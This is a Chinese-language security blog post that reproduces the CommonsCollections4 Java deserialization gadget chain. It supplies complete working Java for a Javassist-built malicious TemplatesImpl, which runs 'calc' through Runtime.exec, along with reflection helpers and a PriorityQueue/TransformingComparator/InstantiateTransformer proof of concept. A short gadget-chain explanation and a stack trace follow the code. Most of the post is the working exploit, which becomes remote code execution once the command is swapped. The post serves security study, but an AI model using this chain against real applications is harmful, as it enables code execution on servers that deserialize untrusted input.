文章目录
前言
同样的,CC4是CC2的变种,改变同CC3用的是InstantiateTransformer而不是InvokerTransformer触发
需要Commons-Collections4 4.0
代码复现
工具类
生成恶意TemplatesImpl:
TemplatesGeneratorPacked/GetAbstractTranslet.java
package TemplatesGeneratorPacked;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.*;
public class GetAbstractTranslet {
public static byte[] generate() throws Exception{
ClassPool pool = ClassPool.getDefault();
CtClass clazz = pool.makeClass("e");
CtClass zuper = pool.get(AbstractTranslet.class.getName());
clazz.setSuperclass(zuper);
CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
constructor.setBody("{Runtime.getRuntime().exec(\"calc\");}");
clazz.addConstructor(constructor);
return clazz.toBytecode();
}
}
TemplatesGeneratorPacked/GetTemplatesImpl.java
package TemplatesGeneratorPacked;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import ReflectPacked.ValueGetterSetter;
public class GetTemplatesImpl {
public static TemplatesImpl getTemplatesImpl() throws Exception{
byte[][] bytes = new byte[][]{GetAbstractTranslet.generate()};
TemplatesImpl templates = TemplatesImpl.class.newInstance();
ValueGetterSetter.setValue(templates, "_bytecodes", bytes);
ValueGetterSetter.setValue(templates, "_name", "a");
ValueGetterSetter.setValue(templates, "_tfactory", new TransformerFactoryImpl());
return templates;
}
}
反射get/set:
ReflectPacked/ValueGetterSetter.java
package ReflectPacked;
import java.lang.reflect.Field;
public class ValueGetterSetter {
public static void setValue(Object obj, String name, Object value) throws Exception{
Field field = obj.getClass().getDeclaredField(name);
field.setAccessible(true);
field.set(obj, value);
}
public static Object getValue(Object obj, String name) throws Exception{
Field field = obj.getClass().getDeclaredField(name);
field.setAccessible(true);
return field.get(obj);
}
}
反序列化:
UnserializePacked.Unserialize.java
package UnserializePacked;
import java.io.*;
public class Unserialize {
public static void unserialize(Object obj) throws Exception{
File f = File.createTempFile("temp", "out");
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f));
oos.writeObject(obj);
oos.close();
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f));
Object o = ois.readObject();
System.out.println(o);
ois.close();
f.deleteOnExit();
}
}
PoC
package cc.cc4;
import ReflectPacked.ValueGetterSetter;
import TemplatesGeneratorPacked.GetTemplatesImpl;
import UnserializePacked.Unserialize;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import javax.xml.transform.Templates;
import java.util.PriorityQueue;
public class PoC {
public static void main(String[] args) throws Exception {
Templates templates = GetTemplatesImpl.getTemplatesImpl();
ConstantTransformer constantTransformer = new ConstantTransformer(String.class);
InstantiateTransformer instantiateTransformer = new InstantiateTransformer(
new Class[]{String.class},
new Object[]{"a"}
);
ChainedTransformer chainedTransformer = new ChainedTransformer(
constantTransformer,
instantiateTransformer);
TransformingComparator comparator = new TransformingComparator(chainedTransformer);
PriorityQueue queue = new PriorityQueue(2, comparator);
queue.add(1);
queue.add(1);
ValueGetterSetter.setValue(constantTransformer, "iConstant", TrAXFilter.class);
ValueGetterSetter.setValue(instantiateTransformer, "iParamTypes", new Class[]{Templates.class});
ValueGetterSetter.setValue(instantiateTransformer, "iArgs", new Object[]{templates});
Unserialize.unserialize(queue);
}
}
代码审计 | 原理分析
思路是CC2和CC3的结合,这里只梳理流程
『Java安全』反序列化-CC2反序列化漏洞POP链分析_ysoserial CommonsCollections2 PoC分析
『Java安全』反序列化-CC3反序列化漏洞POP链分析_ysoserial CommonsCollections3 PoC分析
1. TrAXFilter构造器传入TemplatesImpl会调用newTransformer()
2. InstantiateTransformer.transform()调用指定的类构造器
3. TransformingComparator.compare()调用this.transformer.transform()
4. PriorityQueue反序列化调用comparator.compare()
POP链
newTransformer:439, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
<init>:64, TrAXFilter (com.sun.org.apache.xalan.internal.xsltc.trax)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:57, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:526, Constructor (java.lang.reflect)
transform:116, InstantiateTransformer (org.apache.commons.collections4.functors)
transform:32, InstantiateTransformer (org.apache.commons.collections4.functors)
transform:112, ChainedTransformer (org.apache.commons.collections4.functors)
compare:81, TransformingComparator (org.apache.commons.collections4.comparators)
siftDownUsingComparator:699, PriorityQueue (java.util)
siftDown:667, PriorityQueue (java.util)
heapify:713, PriorityQueue (java.util)
readObject:773, PriorityQueue (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:57, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:606, Method (java.lang.reflect)
invokeReadObject:1017, ObjectStreamClass (java.io)
readSerialData:1893, ObjectInputStream (java.io)
readOrdinaryObject:1798, ObjectInputStream (java.io)
readObject0:1350, ObjectInputStream (java.io)
readObject:370, ObjectInputStream (java.io)
unserialize:14, Unserialize (UnserializePacked)
main:40, PoC (cc.cc4)
完
欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123448990
版权声明:本文为原创,转载时须注明出处及本声明